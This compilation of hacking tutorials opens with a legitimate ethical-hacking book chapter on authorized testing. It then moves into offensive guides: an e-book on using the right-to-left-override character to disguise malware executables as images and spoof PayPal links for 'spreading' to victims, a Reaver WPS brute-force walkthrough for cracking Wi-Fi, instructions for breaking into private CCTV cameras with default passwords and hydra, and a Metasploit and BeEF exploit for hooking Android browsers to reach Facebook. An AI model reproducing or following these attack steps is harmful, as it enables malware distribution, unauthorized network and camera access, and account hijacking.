Pages

Introduction to Ethical Hacking

Chapter 1 Introduction to Ethical Hacking
In This Chapter
L
▶ Understanding hacker objectives ▶ Outlining the differences between ethical hackers and malicious hackers ▶ Examining how the ethical hacking process has come about ▶ Understanding the dangers that your computer systems face ▶ Starting the ethical hacking process
T his ers find Although Webster the professional before book and dictionary ethical the network is bad about security is an guys defines for hacking often security get testing ethical H
overused a ethically chance T
techniques vulnerabilities E perfectly D and to — M exploit the misunderstood for A that science T the and them. I E R I A
of testing your comput- plugging the holes you
word, the Merriam-
to perform sion in accepted the has introduction.
all been professional the obtained tests R
covered I
by standards G
the of conduct. in this book owner(s) of context of this book and
cover — that is, conforming IT practitioners are obligated to
How Hackers We’ve all C heard O
P of Y Beget hackers. Many Ethical of us have aboveboard the even systems Hackers
suffered — and hence the only consequences the after disclaimer
permis-
of hacker actions. So who are these hackers? Why is it important to know about them? The next few sections give you the lowdown on hackers.
Defining hacker
Hacker is a word that has two meanings:
✔ Traditionally, a hacker is someone who likes to tinker with software or
electronic systems. Hackers enjoy exploring and learning how computer systems operate. They love discovering new ways to work electronically.
10
Part I: Building the Foundation for Ethical Hacking
✔ Recently, hacker has taken on a new meaning — someone who maliciously
breaks into systems for personal gain. Technically, these criminals are crackers (criminal hackers). Crackers break into (crack) systems with malicious intent. They are out for personal gain: fame, profit, and even revenge. They modify, delete, and steal critical information, often making other people miserable.
The good-guy (white-hat) hackers don’t like being in the same category as the bad-guy (black-hat) hackers. (These terms come from Western movies where the good guys wore white cowboy hats and the bad guys wore black cowboy hats.) Whatever the case, most people give hacker a negative connotation.
Many malicious hackers claim that they don’t cause damage but instead are altruistically helping others. Yeah, right. Many malicious hackers are elec- tronic thieves.
In this book, I use the following terminology:
✔ Hackers (or bad guys) try to compromise computers.
✔ Ethical hackers (or good guys) protect computers against illicit entry.
Hackers go for almost any system they think they can compromise. Some prefer prestigious, well-protected systems, but hacking into anyone’s system increases their status in hacker circles.
Ethical Hacking 101
You need protection from hacker shenanigans. An ethical hacker possesses the skills, mindset, and tools of a hacker but is also trustworthy. Ethical hack- ers perform the hacks as security tests for their systems.
If you perform ethical hacking tests for customers or simply want to add another certification to your credentials, you may want to consider the ethi- cal hacker certification Certified Ethical Hacker, which is sponsored by EC- Council. See www.eccouncil.org/CEH.htm for more information.
Ethical hacking — also known as penetration testing or white-hat hacking — involves the same tools, tricks, and techniques that hackers use, but with one major difference: Ethical hacking is legal. Ethical hacking is performed with the target’s permission. The intent of ethical hacking is to discover vulnera- bilities from a hacker’s viewpoint so systems can be better secured. It’s part of an overall information risk management program that allows for ongoing security improvements. Ethical hacking can also ensure that vendors’ claims about the security of their products are legitimate.
To hack your own systems like the bad guys, you must think like they think. It’s absolutely critical to know your enemy; see Chapter 2 for details.
Understanding the Need to Hack Your Own Systems
To catch a thief, think like a thief. That’s the basis for ethical hacking.
The law of averages works against security. With the increased numbers and expanding knowledge of hackers combined with the growing number of system vulnerabilities and other unknowns, the time will come when all computer systems are hacked or compromised in some way. Protecting your systems from the bad guys — and not just the generic vulnerabilities that everyone knows about — is absolutely critical. When you know hacker tricks, you can see how vulnerable your systems are.
Hacking preys on weak security practices and undisclosed vulnerabilities. Firewalls, encryption, and virtual private networks (VPNs) can create a false feeling of safety. These security systems often focus on high-level vulnerabili- ties, such as viruses and traffic through a firewall, without affecting how hack- ers work. Attacking your own systems to discover vulnerabilities is a step to making them more secure. This is the only proven method of greatly hardening your systems from attack. If you don’t identify weaknesses, it’s a matter of time before the vulnerabilities are exploited.
As hackers expand their knowledge, so should you. You must think like them to protect your systems from them. You, as the ethical hacker, must know activities hackers carry out and how to stop their efforts. You should know what to look for and how to use that information to thwart hackers’ efforts.
You don’t have to protect your systems from everything. You can’t. The only protection against everything is to unplug your computer systems and lock them away so no one can touch them — not even you. That’s not the best approach to information security. What’s important is to protect your sys- tems from known vulnerabilities and common hacker attacks.
It’s impossible to buttress all possible vulnerabilities on all your systems. You can’t plan for all possible attacks — especially the ones that are currently unknown. However, the more combinations you try — the more you test whole systems instead of individual units — the better your chances of discovering vulnerabilities that affect everything as a whole.
Don’t take ethical hacking too far, though. It makes little sense to harden your systems from unlikely attacks. For instance, if you don’t have a lot of foot traffic
11 Chapter 1: Introduction to Ethical Hacking
12
Part I: Building the Foundation for Ethical Hacking
in your office and no internal Web server running, you may not have as much to worry about as an Internet hosting provider would have. However, don’t forget about insider threats from malicious employees!
Your overall goals as an ethical hacker should be as follows:
✔ Hack your systems in a nondestructive fashion.
✔ Enumerate vulnerabilities and, if necessary, prove to upper management
that vulnerabilities exist.
✔ Apply results to remove vulnerabilities and better secure your systems.
Understanding the Dangers Your Systems Face
It’s one thing to know that your systems generally are under fire from hackers around the world. It’s another to understand specific attacks against your sys- tems that are possible. This section offers some well-known attacks but is by no means a comprehensive listing. That requires its own book: Hack Attacks Encyclopedia, by John Chirillo (Wiley Publishing, Inc.).
Many information-security vulnerabilities aren’t critical by themselves. However, exploiting several vulnerabilities at the same time can take its toll. For example, a default Windows OS configuration, a weak SQL Server admin- istrator password, and a server hosted on a wireless network may not be major security concerns separately. But exploiting all three of these vulnera- bilities at the same time can be a serious issue.
Nontechnical attacks
Exploits that involve manipulating people — end users and even yourself — are the greatest vulnerability within any computer or network infrastructure. Humans are trusting by nature, which can lead to social-engineering exploits. Social engineering is defined as the exploitation of the trusting nature of human beings to gain information for malicious purposes. I cover social engineering in depth in Chapter 5.
Other common and effective attacks against information systems are physical. Hackers break into buildings, computer rooms, or other areas containing crit- ical information or property. Physical attacks can include dumpster diving (rummaging through trash cans and dumpsters for intellectual property, passwords, network diagrams, and other information).
Network-infrastructure attacks
Hacker attacks against network infrastructures can be easy, because many networks can be reached from anywhere in the world via the Internet. Here are some examples of network-infrastructure attacks:
✔ Connecting into a network through a rogue modem attached to a
computer behind a firewall
✔ Exploiting weaknesses in network transport mechanisms, such as TCP/IP
and NetBIOS
✔ Flooding a network with too many requests, creating a denial of service
(DoS) for legitimate requests
✔ Installing a network analyzer on a network and capturing every packet that travels across it, revealing confidential information in clear text
✔ Piggybacking onto a network through an insecure 802.11b wireless
configuration
Operating-system attacks
Hacking operating systems (OSs) is a preferred method of the bad guys. OSs comprise a large portion of hacker attacks simply because every computer has one and so many well-known exploits can be used against them.
Occasionally, some operating systems that are more secure out of the box — such as Novell NetWare and the flavors of BSD UNIX — are attacked, and vulnerabilities turn up. But hackers prefer attacking operating systems like Windows and Linux because they are widely used and better known for their vulnerabilities.
Here are some examples of attacks on operating systems:
✔ Exploiting specific protocol implementations
✔ Attacking built-in authentication systems
✔ Breaking file-system security
✔ Cracking passwords and encryption mechanisms
Application and other specialized attacks
Applications take a lot of hits by hackers. Programs such as e-mail server software and Web applications often are beaten down:
13 Chapter 1: Introduction to Ethical Hacking
14
Part I: Building the Foundation for Ethical Hacking
✔ Hypertext Transfer Protocol (HTTP) and Simple Mail Transfer Protocol
(SMTP) applications are frequently attacked because most firewalls and other security mechanisms are configured to allow full access to these programs from the Internet.
✔ Malicious software (malware) includes viruses, worms, Trojan horses,
and spyware. Malware clogs networks and takes down systems.
✔ Spam (junk e-mail) is wreaking havoc on system availability and storage
space. And it can carry malware.
Ethical hacking helps reveal such attacks against your computer systems. Parts II through V of this book cover these attacks in detail, along with spe- cific countermeasures you can implement against attacks on your systems.
Obeying the Ethical Hacking Commandments
Every ethical hacker must abide by a few basic commandments. If not, bad things can happen. I’ve seen these commandments ignored or forgotten when planning or executing ethical hacking tests. The results weren’t positive.
Working ethically
The word ethical in this context can be defined as working with high profes- sional morals and principles. Whether you’re performing ethical hacking tests against your own systems or for someone who has hired you, everything you do as an ethical hacker must be aboveboard and must support the company’s goals. No hidden agendas are allowed!
Trustworthiness is the ultimate tenet. The misuse of information is absolutely forbidden. That’s what the bad guys do.
Respecting privacy
Treat the information you gather with the utmost respect. All information you obtain during your testing — from Web-application log files to clear-text passwords — must be kept private. Don’t use this information to snoop into confidential corporate information or private lives. If you sense that someone should know there’s a problem, consider sharing that information with the appropriate manager.
Involve others in your process. This is a “watch the watcher” system that can build trust and support your ethical hacking projects.
Not crashing your systems
One of the biggest mistakes I’ve seen when people try to hack their own sys- tems is inadvertently crashing their systems. The main reason for this is poor planning. These testers have not read the documentation or misunderstand the usage and power of the security tools and techniques.
You can easily create DoS conditions on your systems when testing. Running too many tests too quickly on a system causes many system lockups. I know because I’ve done this! Don’t rush things and assume that a network or spe- cific host can handle the beating that network scanners and vulnerability- assessment tools can dish out.
Many security-assessment tools can control how many tests are performed on a system at the same time. These tools are especially handy if you need to run the tests on production systems during regular business hours.
You can even create an account or system lockout condition by social engi- neering someone into changing a password, not realizing that doing so might create a system lockout condition.
The Ethical Hacking Process
Like practically any IT or security project, ethical hacking needs to be planned in advance. Strategic and tactical issues in the ethical hacking process should be determined and agreed upon. Planning is important for any amount of testing — from a simple password-cracking test to an all-out penetration test on a Web application.
Formulating your plan
Approval for ethical hacking is essential. Make what you’re doing known and visible — at least to the decision makers. Obtaining sponsorship of the project is the first step. This could be your manager, an executive, a customer, or even yourself if you’re the boss. You need someone to back you up and sign off on your plan. Otherwise, your testing may be called off unexpectedly if someone claims they never authorized you to perform the tests.
15 Chapter 1: Introduction to Ethical Hacking
16
Part I: Building the Foundation for Ethical Hacking
The authorization can be as simple as an internal memo from your boss if you’re performing these tests on your own systems. If you’re testing for a customer, have a signed contract in place, stating the customer’s support and authorization. Get written approval on this sponsorship as soon as possible to ensure that none of your time or effort is wasted. This documentation is your Get Out of Jail Free card if anyone questions what you’re doing.
You need a detailed plan, but that doesn’t mean you have to have volumes of testing procedures. One slip can crash your systems — not necessarily what anyone wants. A well-defined scope includes the following information:
✔ Specific systems to be tested
✔ Risks that are involved
✔ When the tests are performed and your overall timeline
✔ How the tests are performed
✔ How much knowledge of the systems you have before you start testing
✔ What is done when a major vulnerability is discovered
✔ The specific deliverables — this includes security-assessment reports and a higher-level report outlining the general vulnerabilities to be addressed, along with countermeasures that should be implemented
When selecting systems to test, start with the most critical or vulnerable systems. For instance, you can test computer passwords or attempt social- engineering attacks before drilling down into more detailed systems.
It pays to have a contingency plan for your ethical hacking process in case something goes awry. What if you’re assessing your firewall or Web applica- tion, and you take it down? This can cause system unavailability, which can reduce system performance or employee productivity. Even worse, it could cause loss of data integrity, loss of data, and bad publicity.
Handle social-engineering and denial-of-service attacks carefully. Determine how they can affect the systems you’re testing and your entire organization.
Determining when the tests are performed is something that you must think long and hard about. Do you test during normal business hours? How about late at night or early in the morning so that production systems aren’t affected? Involve others to make sure they approve of your timing.
The best approach is an unlimited attack, wherein any type of test is possi- ble. The bad guys aren’t hacking your systems within a limited scope, so why should you? Some exceptions to this approach are performing DoS, social- engineering, and physical-security tests.
Don’t stop with one security hole. This can lead to a false sense of security. Keep going to see what else you can discover. I’m not saying to keep hacking
until the end of time or until you crash all your systems. Simply pursue the path you’re going down until you can’t hack it any longer (pun intended).
One of your goals may be to perform the tests without being detected. For example, you may be performing your tests on remote systems or on a remote office, and you don’t want the users to be aware of what you’re doing. Other- wise, the users may be on to you and be on their best behavior.
You don’t need extensive knowledge of the systems you’re testing — just a basic understanding. This will help you protect the tested systems.
Understanding the systems you’re testing shouldn’t be difficult if you’re hack- ing your own in-house systems. If you’re hacking a customer’s systems, you may have to dig deeper. In fact, I’ve never had a customer ask for a fully blind assessment. Most people are scared of these assessments. Base the type of test you will perform on your organization’s or customer’s needs.
Chapter 19 covers hiring “reformed” hackers.
Selecting tools
As with any project, if you don’t have the right tools for ethical hacking, accom- plishing the task effectively is difficult. Having said that, just because you use the right tools doesn’t mean that you will discover all vulnerabilities.
Know the personal and technical limitations. Many security-assessment tools generate false positives and negatives (incorrectly identifying vulnerabilities). Others may miss vulnerabilities. If you’re performing tests such as social- engineering or physical-security assessments, you may miss weaknesses.
Many tools focus on specific tests, but no one tool can test for everything. For the same reason that you wouldn’t drive in a nail with a screwdriver, you shouldn’t use a word processor to scan your network for open ports. This is why you need a set of specific tools that you can call on for the task at hand. The more tools you have, the easier your ethical hacking efforts are.
Make sure you that you’re using the right tool for the task:
✔ To crack passwords, you need a cracking tool such as LC4, John the
Ripper, or pwdump.
A general port scanner, such as SuperScan, may not crack passwords.
✔ For an in-depth analysis of a Web application, a Web-application assess-
ment tool (such as Whisker or WebInspect) is more appropriate than a network analyzer (such as Ethereal).
17 Chapter 1: Introduction to Ethical Hacking
18
Part I: Building the Foundation for Ethical Hacking
When selecting the right security tool for the task, ask around. Get advice from your colleagues and from other people online. A simple Groups search on Google (www.google.com) or perusal of security portals, such as SecurityFocus.com, SearchSecurity.com, and ITsecurity.com, often produces great feedback from other security experts.
Hundreds, if not thousands, of tools can be used for ethical hacking — from your own words and actions to software-based vulnerability-assessment pro- grams to hardware-based network analyzers. The following list runs down some of my favorite commercial, freeware, and open-source security tools:
✔ Nmap
✔ EtherPeek
✔ SuperScan
✔ QualysGuard
✔ WebInspect
✔ LC4 (formerly called L0phtcrack)
✔ LANguard Network Security Scanner
✔ Network Stumbler
✔ ToneLoc
Here are some other popular tools:
✔ Internet Scanner
✔ Ethereal
✔ Nessus
✔ Nikto
✔ Kismet
✔ THC-Scan
I discuss these tools and many others in Parts II through V when I go into the specific hack attacks. Appendix A contains a more comprehensive listing of these tools for your reference.
The capabilities of many security and hacking tools are often misunderstood. This misunderstanding has shed negative light on some excellent tools, such as SATAN (Security Administrator Tool for Analyzing Networks) and Nmap (Network Mapper).
Some of these tools are complex. Whichever tools you use, familiarize yourself with them before you start using them. Here are ways to do that:
✔ Read the readme and/or online help files for your tools.
✔ Study the user’s guide for your commercial tools.
✔ Consider formal classroom training from the security-tool vendor or
another third-party training provider, if available.
Look for these characteristics in tools for ethical hacking:
✔ Adequate documentation.
✔ Detailed reports on the discovered vulnerabilities, including how they
may be exploited and fixed.
✔ Updates and support when needed.
✔ High-level reports that can be presented to managers or nontechie types.
These features can save you time and effort when you’re writing the report.
Executing the plan
Ethical hacking can take persistence. Time and patience are important. Be careful when you’re performing your ethical hacking tests. A hacker in your network or a seemingly benign employee looking over your shoulder may watch what’s going on. This person could use this information against you.
It’s not practical to make sure that no hackers are on your systems before you start. Just make sure you keep everything as quiet and private as possi- ble. This is especially critical when transmitting and storing your test results. If possible, encrypt these e-mails and files using Pretty Good Privacy (PGP) or something similar. At a minimum, password-protect them.
You’re now on a reconnaissance mission. Harness as much information as possible about your organization and systems, which is what malicious hack- ers do. Start with a broad view and narrow your focus:
1. Search the Internet for your organization’s name, your computer and
network system names, and your IP addresses.
Google is a great place to start for this.
2. Narrow your scope, targeting the specific systems you’re testing.
Whether physical-security structures or Web applications, a casual assessment can turn up much information about your systems.
3. Further narrow your focus with a more critical eye. Perform actual
scans and other detailed tests on your systems.
4. Perform the attacks, if that’s what you choose to do.
19 Chapter 1: Introduction to Ethical Hacking
20
Part I: Building the Foundation for Ethical Hacking
Evaluating results
Assess your results to see what you uncovered, assuming that the vulnerabil- ities haven’t been made obvious before now. This is where knowledge counts. Evaluating the results and correlating the specific vulnerabilities discovered is a skill that gets better with experience. You’ll end up knowing your systems as well as anyone else. This makes the evaluation process much simpler moving forward.
Submit a formal report to upper management or to your customer, outlining your results. Keep these other parties in the loop to show that your efforts and their money are well spent. Chapter 17 describes this process.
Moving on
When you’ve finished your ethical hacking tests, you still need to implement your analysis and recommendations to make sure your systems are secure.

New security vulnerabilities continually appear. Information systems con- stantly change and become more complex. New hacker exploits and security vulnerabilities are regularly uncovered. You may discover new ones! Security tests are a snapshot of the security posture of your systems. At any time, everything can change, especially after software upgrades, adding computer systems, or applying patches. Plan to test regularly (for example, once a week or once a month). Chapter 19 covers managing security changes.
You might also be interested in hacking your academic success by paying someone to do mymathlab homework for you

How To Turn Every Exe Into Every File Type

How to turn any .exe file into .jpg, .avi, .doc, or whatever extension you like and disguise your links!
Author: n00bz0r
Thank you for purchasing this e-book! You do NOT any have resale rights of this e- book and you may not share this with anyone. The less people that know about this method, the better. If you purchase resale rights, your username will be added in this e-book but you cannot edit its content.
Introduction
In this e-book we are going to use a spoofing vulnerability, known as RTLO [RIGHT TO LEFT OVERRIDE].
SPOOFING's Vulnerabilities are simple ways to deceive users or vulnerable software-computerized systems on real received or posted information. The spoofing regularly makes speak about multiple distinct scenarios like Address URL of Web Page, indicator TLS/SSL, IP address, and anymore possibility. This e-book will mainly analyze two methods where is exploit can be used: 1) To turn a .exe file into a .txt or .img, or whatever and 2) To spoof a url link to make it real like it is starting from a legit domain (ex. www.paypal.com/random_things_here).
RIGHT TO LEFT OVERRIDE is a Unicode character mainly used for the writing and the reading of the Arabic language or Hebrew text and which thus has the ability to reverse the reading order of the characters after it.
Getting Started
There are many ways to copy this Unicode character but this method will show you an easy one in particular.
Tools you will be needing:
• Quick Unicode Input Tool
➢ Download link:
http://www.mediafire.com/?lz1xlo2l2hvqtdc
• File type icon pack
➢ Download link:
http://www.mediafire.com/?dtrv417qae7xrad
• ResHacker
➢ Download link:
http://delphi.icm.edu.pl/ftp/tools/ResHack.zip
• Tutorial on how to use Reshacker:
➢ Link:
http://www.hackforums.net/showthread.php?tid=243460
Method 1: File Extension Spoofing
In this method you are going to learn how to change the extension of each file to whatever you like and still retain the file’s attributes. So if you have an executable file, you can disguise it to an image file and still be able to execute it.
Example:
I will be creating a file, which will be shown as “SexyPictureOfAlexe.jpg” to the user, but it will be an executable file instead (as shown in the picture below):
The actual name of this file is “SexyPictureOfAl*RTLO+gpj.exe”
Of course, you can use reshacker to change the icon and make it a jpeg icon, but we’ll get to that in a little bit.
So, how to do the above spoofing:
After you download the tools from the links provided above, open the Quick Unicode Input Tool, choose “Arial” and find the character U+202E: Right-To-Left Override, as shown in the picture below.
Don’t be surprised that it is invisible, just choose it, click “Select” and then “Copy”.
Now go find your file in the folder you have it. Choose to rename your file and then put the cursor right before the dot (.) and hit ctrl-V (paste) to put the character in there. You are going to notice that the dot has moved to the end of the filename. Now type your new extension, but backwards, so for “jpg”, type “gpj”, without moving the cursor out of its original place. You will end up with a file named “****exe.img” (or at least this is what the user sees). See the picture below if you don’t understand what I am talking about.
(put the cursor before the dot)
(paste the Unicode character)
(type “gmi” from the point you were)
The correct place of the cursor is exactly where the arrow points. Then simply type the extension you like backwards without moving the cursor from its place. Don’t worry if you can’t make it work with the first try, just play around with it until you do.
Now we will use ResHacker in order to change our file’s icon. You can also use it to change its assembly info. Just choose to replace the icon for now, and choose the jpeg icon.
Here is what you get:
The best thing to do in general is to follow these steps:
1) Bind your server to an image. 2) Change the icon of the exe in jpeg icon. 3) Spoof the extension into .img. 4) Spread.
Now you can upload this somewhere to get a direct link. The link will be like that:
Example: test.fileave.com/SexyPictureOfAlexe.img
So your victim will have no idea that this is an executable file, since it has img extension, a jpeg icon and also an image opens when he clicks it. ☺
You can use the same idea to spread as .avi, .ipa , .pdf, .jpg, .txt, .php, or whatever you can think of, via Warez and Torrents.
This was the end of method 1. Obviously you can use this to change your exe file into any file type you like. Use your imagination ☺
Method 2 : Url Spoofing
Okay, now that you have understood the extension spoofing, the url spoofing will be a piece of cake. I will not go into very much detail because the principle is exactly the same.
The basic steps are:
1) Go to your host and make adjustments so that you have the desired
destination in a link alike to the example below (You can have your drive-by in there or whatever). 2) Use the Quick Unicode Input Tool to copy the RTLO character as described
in method 1. 3) Share the link along with RTLO character in front of it. This will end up on
people seeing the link inversed and thinking that your domain is “paypal.com” in that case. 4) Spread the link.
Example: [RTLO] http://www.maliciouswebsite.com/moc.lapyap.www://ptth Would show up as: http://www.paypal.com/moc.etisbewsuoicilam.www//:ptth
This is the end of method 2.
Conclusion
This e-book showed you how spoofing works and two of its most important and valuable techniques. There are other fields where spoofing could be used also, but they will not be covered in this e-book.
Feel free to PM me and ask any questions that you may have.

Hope you’ve enjoyed this e-book And Best of luck on your Spreading ☺

How To Hack WPA2 Wifi WPS Pin Attack

How To Hack WPA2 Wifi:
WPS Pin Attack
I am going to teach you how to easily hack WPA/WPA2-PSK enabled networks using Reaver. The targeted router should support WPS (WiFi Protected Setup) which is supported by most routers nowadays. WPS is an optional device configuration protocol for wireless access points which makes it really easy to connect.
WPS exists in most routers for easy setup process through the WPS pin, which is hard- coded into the wireless access point. Reaver takes the advantage of a vulnerability in WPS. Thanks to Craig Heffner for releasing an open-source version of this tool named Reaver that exploits the vulnerability. In simple terms, Reaver tries to bruteforce the pin; which will reveal the WPA or WPA2 password after enough time.
NOTE: This tutorial is for Educational Purposes Only!
What You’ll Need
You do not have to be a expert at Linux or at using a computer. The simple command- line (console ) will do it all. You may need a fair bit of time for this process and maybe also some luck. The brute force may take from 2 hours to more than 10 hours. There are various ways to set up Reaver, but here are the requirements for this guide.
• Backtrack OS. Backtrack is a bootable Linux distribution with lots of pen- testing tools. You can use various other Linux distribution but I prefer Backtrack. If you don`t know how to install Backtrack then please check this link first.
• Computer and wireless network card. I cannot guarantee this will work with all the internal wireless card. I recommend a external wireless card.
• Patience. The process is simple but brute forcing the PIN takes time. So you have to be patient. Kicking the computer won’t help.
Let’s Get Started
UPDATE: Instead Of Using Backtrack, Use Kali Linux.
Its The New Backtrack.
Step 1: Boot into Backtrack OS / Kali Linux OS
You can use any method to boot into Backtrack eg. from live CD, VMware, dual boot, etc. Boot it first into the GUI mode and open up a new console (command line) which is in the taskbar. Then boot into backtrack.During the boot process, BackTrack will prompt you to to choose the boot options. Select “BackTrack Text – Default Boot Text Mode” and press Enter.
After some time Backtrack will take you into a command line prompt where you should type startx and press Enter. BackTrack will boot will into Graphical User Interface (GUI) mode.
Step 2 : Install Reaver (Skip this step if you are using BackTrack 5)
Reaver should be already installed in the Backtrack 5 but if you are using an older version of Backtrack or any other Linux distribution, you can install Reaver by using the steps below.
1. First Connect your BackTrack to the internet. For WiFi connection go to
Application > Internet > WICD Network Manager.
2. Select your network and click connect and input your password if necessary,
click OK and click CONNECT the second time.
Now that you are connected to internet, it’s time to install Reaver. Click the terminal icon in the menu bar. And at the console type the following:
apt-get update
apt-get install reaver
Now if everything worked fine you will get a freshly installed Reaver tool. If you are testing it in your own system, please go to WICD Network Manager and Disconnect yourself first!
Step 3 : Gather Information
Before launching the Reaver attack, you need to know your target wireless network name or BSSID. This is the series of unique letters and number of a particular router, and you will need its channel number too. To find this, make your wireless card go into monitor mode, and gather the required information from the access points. Let’s go.
First lets find your wireless card. Inside terminal or console, type:
airmon-ng
Press Enter and you should see a list of interface names of different devices. There should be a wireless device in that list connected to BackTrack. Probably it may be WLAN0 or WLAN1.
Note: To connect your wireless network card into WMware, firstly, connect it to the USB. You will see a small USB icon that looks like the figure in the top right of VMware. Right-click on the icon and click connect. The USB sign will turn green and start to glow.
Enable monitor mode. Assuming your wireless card interface name is WLAN0, type this command in that same console.
airmon-ng start wlan0
This code will create a new monitor mode interface mon0 as in the screenshot below. Keep note of the code.
Search the BSSID of the Access Point(router) you want to crack. There are few ways to search for the Access Point BSSID, but I prefer to use the inbuilt Reaver search method which shows the list of WPS-vulnerable BSSIDs only.
In the console, type this following command and press enter:
wash -i mon0
You will see the list of wireless networks that support WPS and are vulnerable to Reaver as seen in the screenshot below. After few minutes you can stop the scan by pressing Ctrl+C.
Step 4: Let’s Start Cracking
I suggest you to try to crack the ones which have WPS lock disabled or say “NO” in WPS Locked column. It may also work if it says YES but I am not sure of that. For that, copy the BSSID of the target AP and also keep note of its channel. In the console, type the following then Enter:
reaver -i monitormode -c channel -b targetbssid -vv
In my case the monitor mode will be mon0 channel 1, targetbssid would be C8:3A:35:54:88:81
-vv is written to show the current statistic of the attack as a percentage completed, currently brute forcing PIN and so on; so we will type the following and enter:
reaver -i mon0 -c 1 -b C8:3A:35:54:88:81 -vv
Press Enter and you should see the attack process as in the screenshot below.
Please note that you will not get “Restore previous session...” at this point, because I already tried to crack it, and it’s prompting me to resume from that paused point.
Your progress will also be saved if you press Ctrl+C. It will then prompt you in the same way, if you again hit the command, and you can resume it from there.
Now just wait or have some coffee and let Reaver do its magic.
It might take from 2 hours to 10 hours or more. There are 8 numeric digits of WPS, but the WPS authentication protocol cuts the pin in half and validates each half separately. Since the last digit of pin is a cheksum value, which can be calculated on the basis of previous value, there are 10^4=10,000 possible values for first half and then 10^3=1000 values for the last pin. So the WPS pin code is one of 11,000 possible pin codes. Some APs can check the WPS pin at the rate of 1 pin per second. Some take more so it depends upon the AP, and also the network connection.
When the PIN is successfully brute-forced, Reaver will show you the WPS PIN and the plain password of the AP like in the below screenshot.
I recommend you keep note of the WPS pin, so that if the password is changed again you can hack that in few seconds the next time by using the following process.
reaver -i (monitor interface) -b (BSSID) -c (channel) --pin=(8 digit pin) -vv
Example:
reaver -i mon0 -b 11:22:33:44:55:66 -c 1 --pin=12345678 -vv
So now the error part... as you might get a bunch of errors depending upon your conditions. You might get some timeout but that’s normal. If you are getting other errors, see the below Error Section.
Error Section:
• If 10 consecutive unexpected WPS errors are encountered, a warning message will be shown. This may be a sign that the AP is rate limiting pin attempts. A waiting command can be issued whenever these warning messages appear. Use the following command:
reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
• The default receive timeout period is 5 seconds. This timeout period can be set manually if necessary (minimum timeout period is 1 second):
reaver -i mon0 -b 00:01:02:03:04:05 -t 3
• The default delay period between pin attempts is 1 second. This value can be increased or decreased to any value. Please note that 0 means no delay:
reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Here ends the tutorial on how to crack wireless network easily using Reaver.

Good Luck!

How to Hack CCTV Private Cameras

How to Hack CCTV Private Cameras
Now a days CCTV cameras are used many place like shops, malls, offices, warehouse etc and more. for security reason and for many more purposes. This guide will show you how to hack CCTV cameras. If search on Google for CCTV camera hacking , you will be find tricks for public CCTV camera hacking tricks. But here you will be hack private CCTV cameras
Step 1: Download Angry Ip Scanner Angry Ip scanner is powerful GUI Port scanner . Angry Ip scanner available for all major OS.
Download and Install Angry ip scanner
Step 2: Choose Ip Address Range Its important that how to choose proper ip address range for CCTV camera hacking. CCTV cameras are connected with broadband internet connection. If your accessing broadband router then find your public ip address. Just type 'My IP' in Google or Bing search bar. Google will show your public ip address
Here 77.247.181.165 is my public ip . So ip range can be 77.247.181.1 o 77.247.181.255 or 77.247.181.1 o 77.247.185.255
Step 3: Configure Angry Ip for CCTV Camera Hacking Open Angry Ip Scanner
Go to tools > Preferences > Ports | add ports 80,8080,23 in Port selection tab It will scan 80,8080 and 23 port.
We need add web detect. Web detect can show short details about device details connected to internet. like as follows:
1.CCTV camera model name 2.CCTV camera name 3.router name or router model name
Add web detect as follows
Go to Tools > Fetchers > add (<<) web detect
Click OK
Step 4: Start Ip Range Scanning Add ip range in Ip range tab and click start
After scanning finished you will find interesting information in web detect tab some examples as follows
1.RomPager/4.07 UPnP/1.0 ­­­­­ router 2.uc­httpd 1.0.0 ­­­­­ CCTV camera 3.DVRDVS­Webs ­­­­­ CCTV camera
4.
microhttpd ­­­­­ router 5.Webs ­­­­­ CCTV camera 6.Hikvision­Webs ­­­­­ CCTV camera 7.iBall­Baton ­­­­­ CCTV camera
Copy ip address of detected CCTV camera and pest in browser press enter.
Step 5: Default Username and Password Most of the CCTV cameras and router configured default username and password. example
Username : admin | password : admin Username : admin | password : (blank password) Username : admin | password : 12345 Username : admin | password : 9999
You can find default username and password list trying some googling
some CCTV cameras need plugin, you can download from same page. If not found plugin at same page then go to manufacture website site and download it.
Step 6: Crack CCTV Camera Password Using Hydra If default password not work then we need to crack it. hydra is powerful brute for tool can crack CCTV cameras password.
Note
There are 100s of bruteforcing tools availble like hashcatocl but we'll focus on hydra as its our favourite.
Now fire up kali root@DeepHack:~# hydra ­s 80 ­l admin ­P /root/Desktop/wl/cctvpass.txt ­e ns ­t 16 targetIP http*
Hydra syntax
-s 80 -- define port number
-l admin -- default login name admin
-P /root/desktop/worldlist.txt -- choose your word list for brute force
-e --- empty password
ns --- try login as passwordand try empty password
http --- port name for attack

Using this you can hack some CCTV cameras!

Hacking Wireless Networks for Dumies

Hacking Facebook - Same Origin Policy Exploit

Hacking Facebook:
Same Origin Policy Exploit
Same-origin policy (SOP) is one of the key security measures that every browser should meet. What it means is that browsers are designed so that webpages can't load code that is not part of their own resource. This prevents attackers from injecting code without the authorization of the website owner.
Unfortunately, the default Android browser can be hacked as it does not enforce the SOP policy adequately. In this way, an attacker can access the user's other pages that are open in the browser, among other things. This means that if we can get the user to navigate to our website and then send them some malicious code, we can then access other sites that are open in their browser, such as Facebook.
Step 1: Open Metasploit
Let's begin by firing up Kali and then opening Metasploit by typing:
kali > msfconsole
You should get a screen like this.
Step 2: Find the Exploit
Next, let's find the exploit for this hack by typing:
msf > search platform:android stock browser
When we do so, we get only one module:
auxiliary/gather/android_stock_browser_uxss
Let's load that module by typing:
msf > use auxiliary/gather/android_stock_browser_uxss
Step 3: Get the Info
Now that we have loaded the module, let's get some information on this module. We can do this by typing:
msf >info
As you can see from this info page, this exploit works against all stock Android browsers before Android 4.4 KitKat. It tells us that this module allows us to run arbitrary JavaScript in the context of the URL.
Step 4: Show Options
Next, let see what options we need to set for this module to function. Most importantly, we need to set the REMOTE_JS that I have highlighted below.
Step 5: Open BeEF
Now, open BeEF On Kali Linux
Step 6: Set JS to BeEF Hook Back to Metasploit now. We need to set the REMOTE_JS to the hook on
BeEF. Of course, make certain you use the IP of the server that BeEF is running on.
msf > set REMOTE_JS http://192.168.1.107:3000/hook.js
Next, we need to set the URIPATH to the root directory /. Let's type:
msf > set uripath /
Step 7: Run the Server
Now we need to start the Metasploit web server. What will happen now is that Metasploit will start its web server and serve up the BeEF
hook so that when anyone navigates to that website, it will have their browser hooked to BeEF.
msf > run
Step 8: Navigate to the Website from
an Android Browser
